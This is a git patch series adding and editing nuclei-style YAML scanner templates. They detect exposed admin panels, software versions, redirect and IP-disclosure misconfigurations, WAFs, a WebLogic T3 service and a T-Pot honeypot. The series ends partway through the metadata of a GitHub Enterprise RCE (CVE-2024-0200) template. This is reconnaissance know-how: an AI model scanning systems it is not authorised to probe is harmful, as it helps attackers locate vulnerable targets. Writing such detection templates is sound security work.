From a2f84c9302a2f7757ff13838ae7ac64a48139ce9 Mon Sep 17 00:00:00 2001 From: Paolo Serra Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 001/375] Added template for unigui-server-monitor-exposure --- unigui-server-monitor-exposure.yaml | 34 +++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 unigui-server-monitor-exposure.yaml diff --git a/unigui-server-monitor-exposure.yaml b/unigui-server-monitor-exposure.yaml new file mode 100644 index 0000000000..bd43afad2f --- /dev/null +++ b/unigui-server-monitor-exposure.yaml @@ -0,0 +1,34 @@ +id: unigui-server-monitor-exposure + +info: + name: UniGUI Server Monitor Panel Exposure + author: serrapa + severity: medium + description: Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + reference: + - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm + tags: exposure,unigui + +requests: + - method: GET + path: + - "{{BaseURL}}/server" + + matchers-condition: and + matchers: + - type: word + words: + - "uniGUI Standalone Server" + - "uniGUI License Information" + - "Server Statistics" + part: body + + - type: status + status: + - 200 + + - type: dsl + dsl: + - "contains(body, 'layout:\"fit\",title:\"uniGUI Standalone Server\"')" + - "contains(body, 'layout:\"absolute\",title:\"Server Statistics\"')" + From 075b22acb734e63b7e7631913c8a79b77f0b1980 Mon Sep 17 00:00:00 2001 From: Anonymous Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 002/375] Added template for wordpress-bricks-builder-theme-detect --- wordpress-bricks-builder-theme-detect.yaml | 31 ++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 wordpress-bricks-builder-theme-detect.yaml diff --git a/wordpress-bricks-builder-theme-detect.yaml b/wordpress-bricks-builder-theme-detect.yaml new file mode 100644 index 0000000000..ceba2ead00 --- /dev/null +++ b/wordpress-bricks-builder-theme-detect.yaml @@ -0,0 +1,31 @@ +id: wordpress-bricks-builder-theme-detect +info: + name: Detect WordPress Bricks Builder Theme Version <= 1.9.6 + author: yourname + severity: info + description: Checks for Bricks Builder Theme versions 1.9.6 and below. + reference: + - https://0day.today/exploit/description/39489 + tags: wordpress,bricksbuilder,detection + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "Bricks Builder" + part: body + + - type: regex + regex: + - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" + part: body + condition: or + + - type: status + status: + - 200 From bafb1f984e80329939259fc48972031f4852a0b0 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 003/375] Added template for apache-answer-version-detection-regex --- apache-answer-version-detection-regex.yaml | 28 ++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 apache-answer-version-detection-regex.yaml diff --git a/apache-answer-version-detection-regex.yaml b/apache-answer-version-detection-regex.yaml new file mode 100644 index 0000000000..85eceaa7ea --- /dev/null +++ b/apache-answer-version-detection-regex.yaml @@ -0,0 +1,28 @@ +id: apache-answer-version-detection-regex + +info: + name: Apache Answer Version Detection with Regex + author: Mohammad Reza Omrani | @omranisecurity + severity: info + description: Extracts the version of Apache Answer from the API endpoint using regex. + +requests: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo/" + headers: + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + Referer: "{{BaseURL}}/users/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' From f8ec45356e47d11a6a77bc540de71dda4ae7f37a Mon Sep 17 00:00:00 2001 From: Paolo Serra Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 004/375] Added template for uni-gui-framework-detection --- uni-gui-framework-detection.yaml | 39 ++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 uni-gui-framework-detection.yaml diff --git a/uni-gui-framework-detection.yaml b/uni-gui-framework-detection.yaml new file mode 100644 index 0000000000..af1c00c6e3 --- /dev/null +++ b/uni-gui-framework-detection.yaml @@ -0,0 +1,39 @@ +id: uni-gui-framework-detection + +info: + name: Detect UniGUI Framework and Version + author: serrapa + severity: info + description: Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "uni-xtheme-" + - "ext-all.js" + - "uniVars._extVer=" + condition: or + part: body + - type: regex + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)/' + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + part: body + extractors: + - type: regex + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)/' + part: body + name: uni_gui_version + - type: regex + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + part: body + name: ext_js_version + From dfbd3dd3dada37b854cf16df12a84c242488e032 Mon Sep 17 00:00:00 2001 From: idealphase Date: Mon, 29 Apr 2024 16:23:33 +0700 Subject: [PATCH 005/375] Update https-to-http-redirect.yaml added HTTP status code 303, 306, 308 that can be redirected as well. --- http/misconfiguration/https-to-http-redirect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index b32e2d48b7..ec60c5c28b 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -2,7 +2,7 @@ id: https-to-http-redirect info: name: HTTPS to HTTP redirect Misconfiguration - author: kazet + author: kazet, idealphase severity: info description: | Detects whether there is a redirect from https:// to http:// @@ -21,6 +21,6 @@ http: dsl: - 'startswith(tolower(location), "http://")' - 'startswith(tostring(BaseURL), "https://")' - - '(status_code == 301 || status_code == 302 || status_code == 307)' + - '(status_code == 301 || status_code == 302 || status_code == 303 || status_code == 306 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efb999299d91727307015418aa6194270d37d3aec81b3357ac608f26e25b304a0220034415e5f53862e08c79733a9b20cc2f86959c7344e8d9c97d533260b086aa95:32bd8904a85baa2268cd2e24368f3b1a From 273f4aa5313063b54e5b97304b44de92b5d3864c Mon Sep 17 00:00:00 2001 From: idealphase Date: Mon, 29 Apr 2024 16:42:04 +0700 Subject: [PATCH 006/375] Update https-to-http-redirect.yaml add HTTP status code 300 (Multiple Choices) remove HTTP status code 306 (Unused) --- http/misconfiguration/https-to-http-redirect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index ec60c5c28b..6e77295ca0 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -21,6 +21,6 @@ http: dsl: - 'startswith(tolower(location), "http://")' - 'startswith(tostring(BaseURL), "https://")' - - '(status_code == 301 || status_code == 302 || status_code == 303 || status_code == 306 || status_code == 307 || status_code == 308)' + - '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a00473045022100efb999299d91727307015418aa6194270d37d3aec81b3357ac608f26e25b304a0220034415e5f53862e08c79733a9b20cc2f86959c7344e8d9c97d533260b086aa95:32bd8904a85baa2268cd2e24368f3b1a +# digest: 4a0a00473045022100b9fde0b93319dcf6c7deda7cbca2fc520ef1dfb694e8756f6f04cdfb585c070e02205737762ea399cbcdaf947d7a6e394df2676b64d3e867497034ce78ba661eb683:32bd8904a85baa2268cd2e24368f3b1a From 590cb2666f2edb03b6318dd49cd6e06424e641e3 Mon Sep 17 00:00:00 2001 From: idealphase Date: Tue, 30 Apr 2024 13:36:55 +0700 Subject: [PATCH 007/375] Update https-to-http-redirect.yaml Added using meta refresh to create an instant client-side redirect --- http/misconfiguration/https-to-http-redirect.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 6e77295ca0..38b23aae40 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -16,6 +16,7 @@ http: path: - "{{BaseURL}}" + matchers-condition: or matchers: - type: dsl dsl: @@ -23,4 +24,11 @@ http: - 'startswith(tostring(BaseURL), "https://")' - '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a00473045022100b9fde0b93319dcf6c7deda7cbca2fc520ef1dfb694e8756f6f04cdfb585c070e02205737762ea399cbcdaf947d7a6e394df2676b64d3e867497034ce78ba661eb683:32bd8904a85baa2268cd2e24368f3b1a + + - type: dsl + dsl: + - 'startswith(tostring(BaseURL), "https://")' + - 'status_code == 200' + - 'contains(tolower(body), " Date: Tue, 30 Apr 2024 22:29:42 +0330 Subject: [PATCH 008/375] Add umami-detect template --- http/technologies/umami-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/technologies/umami-detect.yaml diff --git a/http/technologies/umami-detect.yaml b/http/technologies/umami-detect.yaml new file mode 100644 index 0000000000..f5c4e43ae3 --- /dev/null +++ b/http/technologies/umami-detect.yaml @@ -0,0 +1,28 @@ +id: umami-detect + +info: + name: Umami Detect + author: userdehghani + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"umami" + tags: tech,umami,analytics + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "umami - login" + - "

umami

" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d0b9af2fc7fd9273536cfbf4a46d025505d935c2 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Tue, 30 Apr 2024 23:17:57 +0330 Subject: [PATCH 009/375] Update umami-detect.yaml --- http/technologies/umami-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/technologies/umami-detect.yaml b/http/technologies/umami-detect.yaml index f5c4e43ae3..ce2a42af6e 100644 --- a/http/technologies/umami-detect.yaml +++ b/http/technologies/umami-detect.yaml @@ -19,10 +19,10 @@ http: - type: word part: body words: - - "umami - login" - - "

umami

" + - 'umami - login' + - '

umami

' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 0abae9dc37adfb16934b291dcc865e602aa841aa Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:12:01 -0300 Subject: [PATCH 010/375] Create boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 33 ++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/boa-webserver.yaml diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml new file mode 100644 index 0000000000..e9cf35127e --- /dev/null +++ b/http/exposed-panels/boa-webserver.yaml @@ -0,0 +1,33 @@ +id: boa-webserver + +info: + name: Boa Web Server- Detect + author: johnk3r + severity: info + description: Boa Web Server panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + tags: boa,panel + +http: + - method: GET + path: + - "{{BaseURL}}/admin/login.asp" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Boa" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 006e644ece73942cc5c06e16bf753653eb22d6ea Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:16:59 -0300 Subject: [PATCH 011/375] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index e9cf35127e..69b5dbb3f0 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -5,6 +5,8 @@ info: author: johnk3r severity: info description: Boa Web Server panel was detected. + reference: + - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 0771e35cb810267146af011735a3c403d52fdc5d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:19:25 -0300 Subject: [PATCH 012/375] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 69b5dbb3f0..6027b0d1d5 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -15,7 +15,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/admin/login.asp" + - "{{BaseURL}}" matchers-condition: and matchers: From 52ca8ac5b1a60f6ba5d26644f12dca1f631e607b Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:19:35 -0300 Subject: [PATCH 013/375] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 6027b0d1d5..7510f68dc1 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -22,7 +22,7 @@ http: - type: regex part: header regex: - - "Boa" + - "Boa/" - type: status status: From 5c88c9f2f195bcb4eee8a9c4b62a3f67fb450f77 Mon Sep 17 00:00:00 2001 From: 0xTaylor <0xTaylor@chaosdao.org> Date: Thu, 2 May 2024 11:51:27 -0700 Subject: [PATCH 014/375] Fix regex matcher and extractor to match only rfc1918 addresses --- http/misconfiguration/internal-ip-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 20d7eea1bc..790bd2e7a6 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -29,7 +29,7 @@ http: - type: regex part: location regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' - type: dsl dsl: @@ -44,6 +44,6 @@ http: - type: regex part: location regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' # digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950 From d2b760ec6fe48ff934d496bea01204cda7a6aefd Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 4 May 2024 20:07:21 -0300 Subject: [PATCH 015/375] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 7510f68dc1..2c84f8fb10 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -4,9 +4,10 @@ info: name: Boa Web Server- Detect author: johnk3r severity: info - description: Boa Web Server panel was detected. + description: Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. reference: - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ + - http://www.boa.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 654317648bc7dbcdfaa8a2367577d6538e480ec2 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 4 May 2024 20:07:45 -0300 Subject: [PATCH 016/375] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 2c84f8fb10..814f0a8c45 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -11,7 +11,7 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 - tags: boa,panel + tags: boa,tech http: - method: GET From 0221a0f006b0910c50dd8c5fe239813a86cc90ac Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 13:53:56 +0100 Subject: [PATCH 017/375] tpot honeypot detection --- http/honeypot/tpot-honeypot-detect.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/honeypot/tpot-honeypot-detect.yaml diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml new file mode 100644 index 0000000000..d1a6eab7cf --- /dev/null +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -0,0 +1,27 @@ +id: tpot-honeypot-detect + +info: + name: tpot Honeypot - Detect + author: rxerium + severity: info + description: | + A tpot dashboard has been detected + tags: tpot,honeypot + +http: + - method: GET + path: + - "{{BaseURL}}:64297" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "T-Pot" + - "T-Pot @ Github" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From cc32b70d236a784ea2e9402a82ffbf70fb762f13 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:02:12 +0100 Subject: [PATCH 018/375] add ref --- http/honeypot/tpot-honeypot-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index d1a6eab7cf..7fad9f5525 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -6,6 +6,8 @@ info: severity: info description: | A tpot dashboard has been detected + reference: + - https://github.com/telekom-security/tpotce tags: tpot,honeypot http: From 64c92049d900b8627af769e383aff44c3e77c037 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:08:24 +0100 Subject: [PATCH 019/375] strengthen matchers --- http/honeypot/tpot-honeypot-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 7fad9f5525..43470e4fa6 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -22,6 +22,7 @@ http: words: - "T-Pot" - "T-Pot @ Github" + - "T-Pot ReadMe" condition: and - type: status From c2acefc117df7f80910fab1abd4b1c49accc08c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:40:53 +0530 Subject: [PATCH 020/375] Update and rename umami-detect.yaml to umami-panel.yaml --- .../umami-detect.yaml => exposed-panels/umami-panel.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename http/{technologies/umami-detect.yaml => exposed-panels/umami-panel.yaml} (84%) diff --git a/http/technologies/umami-detect.yaml b/http/exposed-panels/umami-panel.yaml similarity index 84% rename from http/technologies/umami-detect.yaml rename to http/exposed-panels/umami-panel.yaml index ce2a42af6e..f0b4df8995 100644 --- a/http/technologies/umami-detect.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -1,13 +1,14 @@ -id: umami-detect +id: umami-panel info: - name: Umami Detect + name: Umami Panel author: userdehghani severity: info metadata: max-request: 1 shodan-query: http.title:"umami" - tags: tech,umami,analytics + verified: true + tags: panel,umami,login http: - method: GET From 3a021ebf0b68a450d117afff353689575035e774 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:43:27 +0530 Subject: [PATCH 021/375] matcher and metadata update --- http/exposed-panels/umami-panel.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index f0b4df8995..e20ed8e61d 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - shodan-query: http.title:"umami" + shodan-query: http.favicon.hash:-130447705 verified: true tags: panel,umami,login @@ -20,9 +20,7 @@ http: - type: word part: body words: - - 'umami - login' - - '

umami

' - condition: and + - 'Login | umami' - type: status status: From 35ed2626e417469073a72abe40b6bcba8b140752 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:56:16 +0530 Subject: [PATCH 022/375] Update https-to-http-redirect.yaml --- http/misconfiguration/https-to-http-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 38b23aae40..b3ff8b6c71 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -2,7 +2,7 @@ id: https-to-http-redirect info: name: HTTPS to HTTP redirect Misconfiguration - author: kazet, idealphase + author: kazet,idealphase severity: info description: | Detects whether there is a redirect from https:// to http:// From 12f90d5f747b52127b35fa3c189b2eca42f418b0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 May 2024 19:10:46 +0530 Subject: [PATCH 023/375] Update weblogic-t3-detect.yaml --- network/detection/weblogic-t3-detect.yaml | 32 +++++++---------------- 1 file changed, 9 insertions(+), 23 deletions(-) diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index 8ef1dbf125..b1035ceb2a 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -6,24 +6,20 @@ info: severity: info description: | T3 is the protocol used to transport information between WebLogic servers and other types of Java programs. + impact: | + May indicate potential exposure to Weblogic T3 Protocol vulnerabilities + remediation: | + Ensure proper configuration and security measures are in place for Weblogic T3 Protocol metadata: max-request: 2 tags: network,weblogic,detect,t3,oracle + tcp: - inputs: - - data: "t3 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" host: - "{{Hostname}}" + port: 7001 read-size: 1024 matchers: - type: word @@ -38,20 +34,11 @@ tcp: - "HELO:(.*).false" - inputs: - - data: "t3s 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" host: - "tls://{{Hostname}}" read-size: 1024 + port: 7002 matchers: - type: word words: @@ -63,4 +50,3 @@ tcp: group: 1 regex: - "HELO:(.*).false" -# digest: 4b0a004830460221008e4fc5512e10a4bac580826b8cb65a981a9ef61b55f63c6f892cf0dde4b500a8022100e08f41e4f5d99713ff8e920b11a1fdfa70f7b1f5f5d0a2df25aa91bf69a010df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0a2f66bc41b5afd69530811efa41f9d53c568be4 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Wed, 8 May 2024 16:51:34 +0800 Subject: [PATCH 024/375] Add ksyun WAF --- dns/dns-waf-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 05aaa5c995..74bf75b1b9 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -193,4 +193,10 @@ dns: words: - ".iidns.com" + - type: word + part: answer + name: ksyun + words: + - ".ksyunwaf.com" + # digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950 From 6e0963b27dfdfbed77978adefb11aed2e73cede3 Mon Sep 17 00:00:00 2001 From: idealphase Date: Thu, 9 May 2024 11:45:50 +0700 Subject: [PATCH 025/375] Update favicon-detect.yaml Added Veeam Service Provider Console favicon hash --- http/technologies/favicon-detect.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 281b659e8c..73b6a5f708 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3731,8 +3731,13 @@ http: dsl: - "status_code==200 && (\"-1599943282\" == mmh3(base64_py(body)))" + - type: dsl + name: "Veeam Service Provider Console" + dsl: + - "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950 From 80577f4a0468b656a91be0dec85ad8766e8e9447 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Egemen=20Ko=C3=A7hisarl=C4=B1?= <105934393+EgemenKochisarli@users.noreply.github.com> Date: Thu, 9 May 2024 12:47:17 +0300 Subject: [PATCH 026/375] Create f5-next-central-manager.yaml Adds template for detect BIG-IP Next Central Manager Login panels --- .../f5-next-central-manager.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/exposed-panels/f5-next-central-manager.yaml diff --git a/http/exposed-panels/f5-next-central-manager.yaml b/http/exposed-panels/f5-next-central-manager.yaml new file mode 100644 index 0000000000..9dd2622c7b --- /dev/null +++ b/http/exposed-panels/f5-next-central-manager.yaml @@ -0,0 +1,38 @@ +id: f5-next-central-manager + +info: + name: F5 Next Central Manager Login Panel - Detect + author: EgemenKochisarli + severity: info + description: F5 Next Central Manager login panel was detected. + reference: + - https://clouddocs.f5.com/bigip-next/latest/use_cm/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + product: bigip + vendor: big-ip_next_central_manager + tags: panel,fortinet + +http: + - method: GET + path: + - "{{BaseURL}}/gui/login" + + matchers-condition: and + matchers: + - type: word + words: + - "BIG-IP Next | Central Manager" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ea7b07c4cb93b256f23732d2b2c12d70b7638cae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:39:50 +0530 Subject: [PATCH 027/375] Create CVE-2024-0200.yaml --- http/cves/2024/CVE-2024-0200.yaml | 143 ++++++++++++++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0200.yaml diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml new file mode 100644 index 0000000000..231a81e3fd --- /dev/null +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -0,0 +1,143 @@ +id: CVE-2024-0200 + +info: + name: Github Enterprise Authenticated Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. + reference: + - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/ + - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/ + - https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 + - https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 + - https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0200 + cwe-id: CWE-470 + epss-score: 0.0037 + epss-percentile: 0.72517 + cpe: 